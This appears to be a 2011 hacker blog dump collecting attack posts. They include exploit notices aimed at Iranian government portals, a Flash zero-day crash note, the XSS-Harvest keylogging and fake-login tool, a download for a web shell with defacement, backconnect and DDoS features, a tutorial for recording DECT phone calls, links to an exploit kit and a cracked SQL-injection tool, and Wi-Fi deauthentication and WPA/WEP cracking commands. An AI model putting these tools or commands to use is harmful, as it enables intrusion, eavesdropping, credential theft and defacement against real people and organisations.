Sunday, October 23, 2011

turbo pascal 7

download link

http://www.mediafire.com/?27h4qj7mprs35zj

contact me : erfan.omidfar@yahoo.com

Sunday, July 10, 2011

Paliz Portal Multiple Vulnerabilities.

Exploit Title : Paliz Portal Multiple Vulnerabilities
Author : K0242 / TBH
Contact : l3lackhat [at] yahoo [dot] com , l3lackhat.ir [at] gmail [dot] com
webC : www.K0242.gigfa.com
Portal Link : www.palizct.com
Tested ON : All ver 0f Paliz Portal
Security Risk : Medium
Description : All target's iranian GOVerment websites
.
.
.
m0re inf0 :

http://www.k0242.gigfa.com/xpl/PalizPortal.txt

Saturday, July 9, 2011

CVE-2011-0611 Adobe Flash Zero Day embeded in DOC

root@bt:~#flasm -d 1.swf
movie '1.swf' // flash 10, total frames: 1, frame rate: 24 fps, 550x400 px
frame 0
00000000    push FALSE, 326943637, 326943739
0000000F    oldEquals
00000010    not
00000011    branchIfTrue label2 // offset 1100
00000016    branchIfTrue label1 // offset 24
0000001B    constants 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I'  Declared constant pool length 21 differs from calculated length 20
---

crash exist in Adobe Flash Player plugin .
in my test NPSWF32.dll (10.2.153.1)
crash at location 100cfc03

code : http://pastebin.com/DkQThUUY
u can find more info in : 
http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html 
 

Friday, July 8, 2011

Harvesting Cross Site Scripting ~> XSS

To demonstrate the real business impact of cross site scripting I have developed a completely new tool from the ground up - XSS-Harvest. It is multi-threaded pre-forking web server written in Perl, and requires no dependencies other than a couple of common Perl modules; you do not need a web server or database to use this tool. Before going into the detail, I'll list the high level functionality below:

Quote:
* Infection script adds relevant event listeners (keystrokes, onload() and mouse clicks) to the vulnerable page and sets up communication with the XSS-Harvest server.
* Any key entered will be sent covertly to the server.
* Any mouse click performed will be analysed and the data covertly sent to the server.
* Optionally 'redress' the vulnerable page to display a different page on the same subdomain - e.g. a login form.
* If redressing the victim's browser, allow subsequently loaded pages to be also 'infected' - assuming they don't break the same-origin policy (i.e. they're on the same subdomain).
* Keeps track of victims for the lifetime of the XSS-Harvest cookie (future visits are recognised as a returning victim).
* Each victim has a separate history file containing all events, cookies and keystrokes.
* Server console displays real time data received (due to multi-threaded nature, keystrokes are displayed as '.' characters to avoid confusion).
* Tested in IE6-9 (reflected XSS protection in IE9 will limit exploitation to stored XSS only in most cases), FF5, Chrome and various mobile browsers (Safari and Android). Please let me know your success with other browsers.
* Overcomes browser oddities, such as Internet Explorer throttling requests to the same URL when exfiltrating keystrokes.


How to Exploit XSS with XSS-Harvest :

Start the XSS-Harvest server as root if you wish to bind to a TCP port < 1024 (default port is 80), or as a limited user on a port > 1024 using the -p option. To start the server you must instruct it to listen with the -l option.

Insert the following 'injection string' into the vulnerable page:

This will return the client-side JavaScript to the victim, indicated by the 'i' in the URL.

now Entice visitors to the infected page (or to follow a link in the case of reflected XSS).

and Watch your victims roll in - a new history file will be created for each new victim.

If you wish to make use of the redress function, start the server with the -r parameter:


./xss-harvest.pl -l -r http://vulnerablepage.local/login.html


Any incoming victim will now be redirected to the specified page by means of a full window IFRAME overlaid on top of the original vulnerable page. Some screenshots of the server in action are shown below:

image :

http://4.bp.blogspot.com/-LUMEeMiuYiA/ThWcsc5_czI/AAAAAAAA0dI/iuaDTvTcNPY/s640/Screenshot-user%2540computer%253A+%257E-Desktop-xss-harvest.png

Server console showing incoming victims

http://3.bp.blogspot.com/-825esi4AZzY/ThWe5xXLZ4I/AAAAAAAA0dM/TYvrXGPfW4w/s400/Screenshot-d018996d89c997cbcbb00c6913544c91.txt+%2528%257E-Desktop-xss-harvest-history%2529+-+gedit.png

Received events, clicks and keystrokes

Description
Usage:
./xss-harvest.pl -l [-p Port] [-r Redress the victims browser]

Start with (-l) and point your victims at http:///i to be "infected".
e.g. inject something like this into a vulnerable page -

Optionally run ./xss-harvest.pl with the (-r) parameter to redress the victims browser to a different page on the same site (such as a login form) after successful infection.
e.g. ./xss-harvest.pl -l -r http:///login.php

For persistent XSS (infection persists across subsequent pages on the same domain), you must use the redress feature, even if you intend to display the original vulnerable page.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.


Download :
https://docs.google.com/leaf?id=0B-yhjV3y1-D2ZmVlMmUxMWUtNjJhYy00Njc5LWI0M2ItZTMwMmIxMTQ0NTNh&hl=en_GB


. All feedback would be most welcome - please share improvements and distribute under the GPL license.

Requires the following dependencies:

HTTP::Server::Simple::CGI,Digest::MD5, Time::Local, Getopt::Std, Net::Server::PreFork


DOURAN Portal Full Ver Multiple Vulnerabilities.

Exploit Title : DOURAN Portal Full Ver Multiple Vulnerabilities
Author : K0242
Contact : l3lackhat [at] yahoo [dot] com , l3lackhat.ir [at] gmail [dot] com
Portal Link : www.DOURAN.com
Tested ON : All ver 0f Douran Portal
Security Risk : High
Description : All target's iranian GOVerment websites
.
.
.
Read more :

www.k0242.gigfa.com/xpl/DouranPortal.txt

SyRiAn Sh3ll V7

# SyRiAn Sh3ll V7 Priva8.
# Copyright (C) 2011 - SyRiAn 34G13
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# I WISH THAT YOU WILL USE IT AGAINST ISRAEL ONLY !!! .

* Features;
- Mass Defacement Script
- Zone-H Defacer Adder
- Forum Defacer
- PHP Bypasser
-- FTP Brute Forcer
- Admin Control Panel Finder
- Encryption
- Back Connection
- Bind Connection
- Eval
- Safe Mode Bypass
- Open_Basedir Bypass
- SQL manager
- 100% Undetected
- DDOS Attacke
& more...

Download :

http://www.k0242.gigfa.com/t00L/SyRiAn.Sh3ll.V7.txt

Enj0y it ;)

Wednesday, July 6, 2011

DECT Sniffing Dedected~RECORD PHONE CONVERSATIONS

This is a detailled guided videotutorial on how to install and use the dedected.org DECT-sniffing tools, record phonecalls, decode them and listen to them. All this is done with a vanilla BackTrack 5 KDE x86

Back-Track-Wiki:

backtrack-linux.org/​wiki/​index.php/​DECT_Sniffing_Dedected


Contents
1 What is DECT?
1.1 The problem?
1.2 Tested on
2 Installing dedected
2.1 Install from repository
2.2 Install from source
3 Install some additional tools
4 Load the drivers
5 Scan for fixed parts a.k.a. fp (DECT base stations)
6 Ignore phones you don’t want to sniff (e.g. your neighbours!)
7 Record the phone call
8 Decode the call out of the datastream
9 Import the streams into audacity and listen to the calls
10 Clean up / Reload
11 DECT protocol
12 Video: Sniffing DECT phones with BackTrack 5

# What is DECT ?


http://en.wikipedia.org/wiki/Digital_Enhanced_Cordless_Telecommunications

# The problem ?
Most vendors don’t implement encryption in their devices so one can sniff it with certain hardware and software.

Tested on

BackTrack 5 final x86 KDE with kernel 2.6.38
Original Dosch&Amand Type II PCMCIA Card
SIEMENS C1 DECT Phones set up in repeater mode

NOTE: This is experimental software which is not very actively supported anymore!
Installing dedected

In order to get dedected installed on BackTrack, you have the choice between:

Use dedected from the BackTrack 5 repositories.
Compile it on your own if you want to experiment.

Install from repository


root@bt:~# apt-get update
root@bt:~# apt-get install dedected

Install from source

This stage is optional for those wanting to build the tools from source code.


root@bt:~# prepare-kernel-sources
root@bt:~# cd /usr/src/linux
root@bt:~# cp -rf include/generated/* include/linux/
root@bt:~# cd /pentest/telephony
root@bt:~# svn co https://dedected.org/svn/trunk dedected_svn
root@bt:~# cd dedected_svn/com-on-air_cs-linux/
root@bt:~# make && make -C tools

Install some additional tools


root@bt:~# apt-get -y install audacity

Load the drivers


root@bt:~# cd /pentest/telephony/dedected/com-on-air_cs-linux
root@bt:~# make node

If you did not insert your Dosch&Amand Type 2 or Type 3 or Voo:doo # PCMCIA-card do so now! Next, we load the driver:


root@bt:~# make load

Scan for fixed parts a.k.a. fp (DECT base stations)


root@bt:~# cd /pentest/telephony/dedected/com-on-air_cs-linux/tools
root@bt:~# ./dect_cli

If you need info on the usage type "help". If you live in the U.S. switch to the US/DECT 6 band via the "band" command. Let's enable someverbosity:


verb

And start scanning for base stations:


fpscan

After scanning 2-3 times through all channels disable verbosity, and stop scanning:


verb
stop

image :
http://www.backtrack-linux.org/wiki/images/8/80/DECT-BT5-Image02.png

Ignore phones you don’t want to sniff (e.g. your neighbours!)

Start a callscan


callscan
Now grab your DECT handset and make a test phonecall and wait until you see the phonecall .It is also sufficient if you just get a dialing tone. You should see something like


### found new call on 00 82 31 33 73 on channel 7 RSSI 34

stop
Name your basestation if you want:


name 00 82 31 33 73 stallowned
Dump all found phones:


dump
Ignore every other phone except yours via the following command! IMPORTANT!!!


ignore 01 30 95 13 37
Record the phone call

Start automaticially recording of every phone call it detects:


autorec
Now grab your DECT telephony handset and do a testcall. I recommend to call a “time telling serivce” that can be reached over a normal phone number. You should get something like this:


### starting autorec
### stopping DIP
### starting callscan
### trying to sync on 00 82 ab b0 29
### got sync
### dumping to dump_2011-06-11_21_37_37_RFPI_00_82_ab_b0_29.pcap
### stopping DIP
After you hung up your phonecall the dumping should stop:
image :

http://www.backtrack-linux.org/wiki/images/0/0c/DECT-BT5-Image04.png

Decode the call out of the datastream

Stop the autorec:


stop

Decode the audiostream out of the raw dump


root@bt:~# ./decode.sh

image :

http://www.backtrack-linux.org/wiki/images/5/57/DECT-BT5-Image01.png

Import the streams into audacity and listen to the calls

Start audacity via "alt + f2" then type “audacity” and press enter. Import the fixed-part and hte portable-part .wav files from /pentest/telephony/dedected/com-on-air_cs-linux/tools via File -> Import -> Audio or simply "ctrl + shift + I" . Import the files which end in .pcap_fp.ima.g721.wav and .pcap_pp.ima.g721.wav.

Play your phone call with the play button:

image :

http://www.backtrack-linux.org/wiki/images/6/64/DECT-BT5-Image00.png

Hint: if you can only hear noise your phone seems to use some encoding/encryption. You can enable the repeater mode in your telephone so it disables encryption and you can test if your setup is working properly.
Clean up / Reload

If you need to reload the drivers


root@bt:~# cd /pentest/telephony/dedected/com-on-air_cs-linux
root@bt:~# make reload

If you’re finished and want to clean up:


root@bt:~# cd /pentest/telephony/dedected/com-on-air_cs-linux
root@bt:~# make unload
root@bt:~# rm /dev/coa

DECT protocol

If you are interested in more details of the protocol you can open the .pcap file in Wireshark:

image :

http://www.backtrack-linux.org/wiki/images/e/e3/DECT-BT5-Image03.png

Video: Sniffing DECT phones with BackTrack 5 :


http://vimeo.com/25027253

And a snifflog and pdf with much more information can be found there:


offensive-security.com/​backtrack/​sniffing-dect-phones/​

Thanks to 5m7x, dedected (https://dedected.org/trac) is soon to be added to the BackTrack repositories. In our internal tests, the standard AT&T cordless phone was found not to use encryption. The recording quality was phenomenal – you can find a copy of this recording here :

http://www.offensive-security.com/downloads/sniff-dect.mp3​

offensive-security.com/​backtrack/​sniffing-dect-phones-the-details/​
5M7X has completed his DECT write-up, and it rocks. As DECT phone manufacturers
rarely give any indication about their phone encryption capabilities,
the only reliable way to check the security of your phone is to test it yourself.

The paper goes into detail about the underlying technology, hardware and
software needed to test your own phone and assess it’s security.
---------------------------------------------------
Download Sniffing DECT Phones for phun and prophit :

http://www.offensive-security.com/downloads/sniffing-dect-phones-for-fun-and-profit.pdf

Check out the accompanying Video. Dedected will be pushed into the BT repo in a couple of days.

Video :

http://www.youtube.com/v/vAZLZ8dMIL0&hl=en_US&feature=player_embedded&version=3

# This article was contributed by 5M7X and Collected by K0242.

Eleonore Exploit Pack 1.4.4

include old version { > MDAC
> MS009-02
> DX DirectShow
> ActiveX pack
> compareTo
> JNO (JS navigator Object Code)
> MS06-006
> Font tags
> Telnet
> PDF collab.getIcon
> PDF Util.Printf
> PDF collab.collectEmailInfo
> Java D&E
> Soc pack (iframe ver)
}

download link : http://www.mediafire.com/?h2tpfg2w9o9mgdv

download havij 1.14 pro (cracked)

just for fun

download : http://www.4shared.com/file/parzQWMa/havijtar_2.html

Windbg Script for Kernelcallbacks under x86 Architecture

$$ x86 Kernel Callback Finder for CreateProcess/LoadImage/CreateThread/Registry

$$ Frank Boldewin / www.reconstructer.org



.printf "\nCreateProcess Callbacks:\n"

.printf "------------------------\n"



aS CPNAddr  "nt!PspCreateProcessNotifyRoutine";

aS CPNCount "poi(nt!PspCreateProcessNotifyRoutineCount)";

aS Counter  "@$t0";



.block

{

  .for (r ${Counter} = 0; ${Counter} < ${CPNCount}; r ${Counter} = ${Counter} + 1)

  {

    .printf "Callback: %d - Address: 0x%08x\n", ${Counter}+1, poi(((dwo(${CPNAddr} + ${Counter} *4))&-8)+4);

  }

}



.printf "\nLoadImage Callbacks:\n"

.printf "--------------------\n"



aS LINAddr  "nt!PspLoadImageNotifyRoutine";

aS LINCount "poi(nt!PspLoadImageNotifyRoutineCount)";



.block

{

  .for (r ${Counter} = 0; ${Counter} < ${LINCount}; r ${Counter} = ${Counter} + 1)

  {

    .printf "Callback: %d - Address: 0x%08x\n", ${Counter}+1, poi(((dwo(${LINAddr} + ${Counter} *4))&-8)+4);

  }

}



.printf "\nCreateThread Callbacks:\n"

.printf "-----------------------\n"



aS CTNAddr  "nt!PspCreateThreadNotifyRoutine";

aS CTNCount "poi(nt!PspCreateThreadNotifyRoutineCount)";



.block

{

  .for (r ${Counter} = 0; ${Counter} < ${CTNCount}; r ${Counter} = ${Counter} + 1)

  {

    .printf "Callback: %d - Address: 0x%08x\n", ${Counter}+1, poi(((dwo(${CTNAddr} + ${Counter} *4))&-8)+4);

  }

}



.printf "\nRegistry (CMP) Callbacks:\n"

.printf "-------------------------\n"



aS CMNAddr  "nt!CmpCallBackVector";

aS CMNCount "poi(nt!CmpCallBackCount)";



.block

{

  .for (r ${Counter} = 0; ${Counter} < ${CMNCount}; r ${Counter} = ${Counter} + 1)

  {

    .printf "Callback: %d - Address: 0x%08x\n", ${Counter}+1, poi(((dwo(${CMNAddr} + ${Counter} *4))&-8)+4);  

  }

}



ad ${/v:CPNAddr};

ad ${/v:CPNCount};

ad ${/v:LINAddr};

ad ${/v:LINCount};

ad ${/v:CTNAddr};

ad ${/v:CTNCount};

ad ${/v:CMNAddr};

ad ${/v:CMNCount};

ad ${/v:Counter};

update script for back track 5

// This is a update script for Backtrack 5.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define TIME 500000

int check_internet()
{
 if(system("perl -e 'print qq|GET / HTTP/1.0\n\n|;' | nc www.google.com 80 > /dev/null")!= 0 || system("ping -qc1 www.google.com > /dev/null") != 0 || system("ping -qc1 www.l.google.com > /dev/null") != 0) {
  system("clear");
         printf(" [>] Checking for internet connectivity please wait!\n");
         usleep(TIME);
  printf(" [>] No Internet connectivity found, exiting. \n");
  exit(1);
 }
 
 else {
  system("clear");
  printf(" [>] Checking for internet connectivity please wait!\n");
         usleep(TIME);
  printf(" [>] Internet is working!\n");
  printf("\n");
 }
}

void backtrack_update()
{
 printf(" [>] Updating and cleaning Backtrack, please wait.\n");
 usleep(TIME);
 printf("\n");
 if(system("apt-get update && apt-get -y dist-upgrade && apt-get autoremove -y && apt-get -y autoclean") == 0) {
  printf("\n");
  printf(" [>] Backtrack updated and cleaned successfully!\n");
  usleep(TIME);
 }
 else {
  printf(" [>] Failed to update Backtrack.\n");
  usleep(TIME);
 }
}

void exploit_db()
{
        printf(" [>] Updating Exploit-db, please wait.\n");
        usleep(TIME);
        printf("\n");
        if(system("cd /pentest/exploits/exploitdb/platforms/ && svn up") == 0) {
         printf("\n");
         printf(" [>] Exploit-db updated successfully!\n");
  usleep(TIME);
 }
 else {
  printf(" [>] Failed to update Exploit-db.\n");
  usleep(TIME);
 }
}


void set()
{
        printf(" [>] Updating SET, please wait.\n");
        usleep(TIME);
        printf("\n");
        if(system("cd /pentest/exploits/set/ && svn up") == 0) {
   printf("\n");
   printf(" [>] SET updated successfully!\n");
   usleep(TIME);
 }
 else {
  printf(" [>] Failed to update SET.\n");
  usleep(TIME);
 }
}

void warvox()
{
 printf(" [>] Updating Warvox, please wait.\n");
 usleep(TIME);
 printf("\n");
 if(system("cd /pentest/telephony/warvox/ && svn up") == 0) {
   printf("\n");
   printf(" [>] Warvox updated successfully!\n");
   usleep(TIME);
 }
 else {
  printf(" [>] Failed to update Warvox\n");
  usleep(TIME);
 }
}

void aircrack()
{
 printf(" [>] Updating Aircrack-NG and Airodump, please wait.\n");
 usleep(TIME);
 printf("\n");
 if(system("cd /pentest/wireless/aircrack-ng/ && svn up") == 0) {
   system("cd /pentest/wireless/aircrack-ng/scripts/ && chmod a+x airodump-ng-oui-update && ./airodump-ng-oui-update");
   printf("\n");
   printf(" [>] Aircrack-NG and Airodump updated successfully!\n");
   usleep(TIME);
 }
 else {
  printf(" [>] Failed to update Aircrack-ng.\n");
  usleep(TIME);
 }
}

void giskismet()
{
 printf(" [>] Updating Giskismet, please wait.\n");
 usleep(TIME);
 printf("\n");
 if(system("cd /pentest/wireless/giskismet/ && svn up") == 0) {
   printf("\n");
   printf(" [>] Giskismet updated successfully!\n");
   usleep(TIME);
 }
 else {
  printf(" [>] Failed to update Giskismet.\n");
  usleep(TIME);
 }
}

void msf()
{
 printf(" [>] Updating Metasploit, please wait.\n");
 usleep(TIME);
 printf("\n");
 if(system("cd /pentest/exploits/framework3/ && svn up") == 0) {
   printf("\n");
   printf(" [>] Metasploit updated successfully!\n");
   usleep(TIME);
 }
 else {
  printf(" [>] Failed to update Metasploit.\n");
  usleep(TIME);
 }
}

void nessus()
{
 printf(" [>] Updating Nessus plugins, please wait.\n");
 usleep(TIME);
 printf("\n");
 if(system("cd /opt/nessus/sbin/ && ./nessus-update-plugins") == 0) {
   printf("\n");
   printf(" [>] Nessus plugins updated successfully!\n");
   usleep(TIME);
 }
 else {
  printf(" [>] Failed to update Nessus.\n");
  usleep(TIME);
 }
}

void w3af()
{
        printf(" [>] Updating W3AF, please wait.\n");
        usleep(TIME);
        printf("\n");
        if(system("cd /pentest/web/w3af/ && svn up") == 0) {
   printf("\n");
   printf(" [>] W3AF updated successfully!\n");
   usleep(TIME);
 }
 else {
  printf(" [>] Failed to update W3AF.\n");
  usleep(TIME);
 }
}
void nikto()
{
        printf(" [>] Updating Nikto, please wait.\n");
        usleep(TIME);
        printf("\n");
        if(system("cd /pentest/web/nikto/ && ./nikto.pl -update") == 0) {
   printf("\n");
   printf(" [>] Nikto updated successfully!\n");
   usleep(TIME);
 }
 else {
  printf(" [>] Failed to update Nikto.\n");
  usleep(TIME);
 }
}

void sqlmap()
{
        printf(" [>] Updating Sqlmap, please wait.\n");
        usleep(TIME);
        printf("\n");
        if(system("cd /pentest/database/sqlmap/ && svn up --trust-server-cert --non-interactive") == 0) {
   printf(" [>] Sqlmap updated successfully!\n");
   usleep(TIME);
 }
 else {
  printf(" [>] Failed to update SQLmap.\n");
  usleep(TIME);
 }
}

void fasttrack()
{
        printf(" [>] Installing/Updating Fasttrack, please wait.\n");
        usleep(TIME);
        printf("\n");
 system("apt-get -y install fasttrack");
        if(system("cd /pentest/exploits/fasttrack/ && ./fast-track.py -c 1") == 0) {
   printf(" [>] Fasttrack  updated successfully!\n");
   usleep(TIME);
 }
 else {
  printf(" [>] Failed to update Fasttrack.\n");
  usleep(TIME);
 }

}

void pyrit()
{
 printf(" [>] Checking to see if pyrit is installed.\n");
 usleep(TIME);
 printf("\n");
 if(system("pyrit > /dev/null") == 0) {
     printf(" [>] Pyrit installed!\n");
     usleep(TIME);
 }
 else {
     printf(" [>] Installing Pyrit, please wait.\n");
     usleep(TIME);
     system("apt-get -y install libssl-dev scapy python-dev");
     system("svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit_svn");
     system("cd pyrit_svn/pyrit && python setup.py build && python setup.py install");
     system("rm -rf pyrit_svn");
     printf(" [>] Pyrit installed successfully!\n");
 }
}

void nmap()
{
 printf(" [>] Updating Nmap Fingerprints, please wait.\n");
 usleep(TIME);
 if(system("wget http://nmap.org/svn/nmap-os-db -O /usr/local/share/nmap/nmap-os-db") == 0) {
     printf(" [>] Nmap updated successfully!\n");
     printf("\n");
     usleep(TIME);
 }
 else {
     printf(" [>] Failed to update nmap!\n");
     usleep(TIME);
 }
}

void update() 
{
 printf(" [>] Updating the evil script.\n");
 usleep(TIME);
 printf("\n");
 system("rm -rf backtrack5_update.c");
 system("wget http://sickness.tor.hu/wp-content/uploads/2011/06/backtrack5_update.c");
 system("gcc -o backtrack5_update backtrack5_update.c");
 printf("\n");
 printf("Update successfully, now please run the script again!\n");
 exit(0);
}

void changelog()
{
 system("cd /tmp && wget http://sickness.tor.hu/wp-content/uploads/2011/06/changelog.txt -o /dev/null");
 system("less /tmp/changelog.txt");
 system("rm -rf /tmp/changelog.txt"); 
}

void tryharder()
{
 printf(" [] Wrong choice, exiting now ... \n");
 usleep(TIME);
 exit(EXIT_SUCCESS);
}

char menu_exploit()
{
        char ex_choice[4];
        int ex_var;

        printf("        +-++-++-++-++-++-++-++-++-+ +-+ +-++-++-++-++-++-+\n");
        printf("        |B||a||c||k||t||r||a||c||k| |5| |u||p||d||a||t||e|\n");
        printf("        +-++-++-++-++-++-++-++-++-+ +-+ +-++-++-++-++-++-+\n");
 printf("   Section: EXPLOIT TOOLS\n");
 printf("\n");
        printf(" [>] 1. Metasploit Framework.\n");
        printf(" [>] 2. Exploit-db.\n");
        printf(" [>] 3. SET - Social Engineering Toolkit.\n");
 printf(" [>] 4. Update all.\n");
        printf(" [>] 5. Back.\n");
        printf("\n");
        printf(" [>] Enter your choice: ");

        fgets(ex_choice,sizeof(ex_choice),stdin);
 ex_var = atoi(ex_choice);

 switch(ex_var) {
   case 1: msf(); menu_exploit();
   case 2: exploit_db(); menu_exploit();
   case 3: set();  menu_exploit();
   case 4: msf(); exploit_db(); set(); menu_exploit();
   case 5: main();
   default: tryharder(); break;
 }
}

char menu_wireless()
{
        char w_choice[4];
        int w_var;

        printf("        +-++-++-++-++-++-++-++-++-+ +-+ +-++-++-++-++-++-+\n");
        printf("        |B||a||c||k||t||r||a||c||k| |5| |u||p||d||a||t||e|\n");
        printf("        +-++-++-++-++-++-++-++-++-+ +-+ +-++-++-++-++-++-+\n");
        printf("                        Section: WIRELESS & TELEPHONY\n");
        printf("\n");
        printf(" [>] 1. Aircrack-ng and Airdrop.\n");
        printf(" [>] 2. WarVox.\n");
        printf(" [>] 3. Giskismet.\n");
        printf(" [>] 4. Update all.\n");
        printf(" [>] 5. Back.\n");
        printf("\n");
        printf(" [>] Enter your choice: ");
 
 fgets(w_choice,sizeof(w_choice),stdin);
 w_var = atoi(w_choice);
 
 switch(w_var) {
   case 1: aircrack(); menu_wireless();
   case 2: warvox();  menu_wireless();
   case 3: giskismet();  menu_wireless();
   case 4: aircrack(); warvox(); giskismet();  menu_wireless();
   case 5: main();
   default: tryharder(); break;
 }

}


char menu_web_db()
{
        char wd_choice[4];
        int wd_var;

        printf("        +-++-++-++-++-++-++-++-++-+ +-+ +-++-++-++-++-++-+\n");
        printf("        |B||a||c||k||t||r||a||c||k| |5| |u||p||d||a||t||e|\n");
        printf("        +-++-++-++-++-++-++-++-++-+ +-+ +-++-++-++-++-++-+\n");
        printf("                        Section: WEB & DATABASE\n");
        printf("\n");
        printf(" [>] 1. W3AF.\n");
        printf(" [>] 2. Nikto.\n");
        printf(" [>] 3. Sqlmap.\n");
        printf(" [>] 4. Update all.\n");
        printf(" [>] 5. Back.\n");
        printf("\n");
        printf(" [>] Enter your choice: ");

        fgets(wd_choice,sizeof(wd_choice),stdin);
        wd_var = atoi(wd_choice);
 
 switch(wd_var) {
   case 1: w3af(); menu_web_db();
   case 2: nikto(); menu_web_db();
   case 3: sqlmap(); menu_web_db();
   case 4: w3af(); nikto(); sqlmap(); menu_web_db();
   case 5: main();
   default: tryharder(); break;
 }
 

}

char menu_other()
{
 char o_choice[4];
 int c_var;

 printf("        +-++-++-++-++-++-++-++-++-+ +-+ +-++-++-++-++-++-+\n");
        printf("        |B||a||c||k||t||r||a||c||k| |5| |u||p||d||a||t||e|\n");
        printf("        +-++-++-++-++-++-++-++-++-+ +-+ +-++-++-++-++-++-+\n");
        printf("                        Section: OTHER\n");
 printf(" [>] 1. Nessus.\n");
 printf(" [>] 2. Fasttrack.\n");
 printf(" [>] 3. Pyrit.\n");
 printf(" [>] 4. Nmap.\n");
 printf(" [>] 5. Update all.\n");
 printf(" [>] 6. Back.\n");
 printf("\n");
        printf(" [>] Enter your choice: ");

 fgets(o_choice,sizeof(o_choice),stdin);
 c_var = atoi(o_choice);
 
 switch(c_var) {
   case 1: nessus(); menu_other();
   case 2: fasttrack(); menu_other();
   case 3: pyrit(); menu_other();
   case 4: nmap(); menu_other();
   case 5: nessus(); fasttrack(); pyrit(); nmap(); menu_other();
   case 6: main();
   default: tryharder(); break;
   
 }
}
  
 

main()
{
 char choice[4];
 int choice_var;
 check_internet();

 printf(" +-++-++-++-++-++-++-++-++-+ +-+ +-++-++-++-++-++-+\n");
  printf(" |B||a||c||k||t||r||a||c||k| |5| |u||p||d||a||t||e|\n");
  printf(" +-++-++-++-++-++-++-++-++-+ +-+ +-++-++-++-++-++-+\n");
 printf("                        Section: MAIN\n");
 printf(" [>] 1. Update and clean Backtrack.\n");
 printf(" [>] 2. Exploit tools.\n");
 printf(" [>] 3. Wireless & Telephony.\n");
 printf(" [>] 4. Web & Database.\n");
 printf(" [>] 5. Others.\n");
 printf(" [>] 6. Update all.\n");
 printf(" [>] 7. Update script.\n");
 printf(" [>] 8. Changelog.\n");
  printf(" [>] 9. Exit.\n");
 printf("\n");
 printf(" [>] Enter your choice: ");

 fgets(choice,sizeof(choice),stdin);
 choice_var = atoi(choice);

 switch(choice_var) {
   case 1: backtrack_update(); main();
   case 2: menu_exploit(); main();
   case 3: menu_wireless(); main();
   case 4: menu_web_db();  main();
   case 5: menu_other(); main();
   case 6: backtrack_update(); exploit_db(); set(); warvox(); aircrack(); giskismet(); msf(); nessus(); w3af(); nikto(); sqlmap(); fasttrack(); pyrit(); nmap(); main();
   case 7: update();
   case 8: changelog(); main();
   case 9: exit(1);
   default: tryharder(); break;
 }
 
 return 0;
}

Sunday, July 3, 2011

cracking wpa with airmon & pyrit

airmon-ng
airmon-ng start wlan0
airodump-ng mon0
airodump-ng -c 11 -w erfan --bssid mon0
aireplay --deauth 0 -a bssid -c client mon

pyrit eval
pyrit -i pass.lst import_passwords
pyrit -e j2neonAP create_essid
pyrit eval
pyrit batch
pyrit verify
pyrit -o wpadb export_hashdb

aircrack -r wpadb erfan01.cap

cracking wep with client

airmon-ng start [device]
airodump-ng mon0
airodump-ng -c [channel] -w [erfan] --bssid [bssid] mon0
aireplay-ng -1 0 -a [bssid] -h Assoc-Station-mac -e [essid] mon0
aireplay-ng -3 -b [bssid] -h Assoc-Station-mac mon0
aircrack-ng -b [bssid] [erfan]-01.cap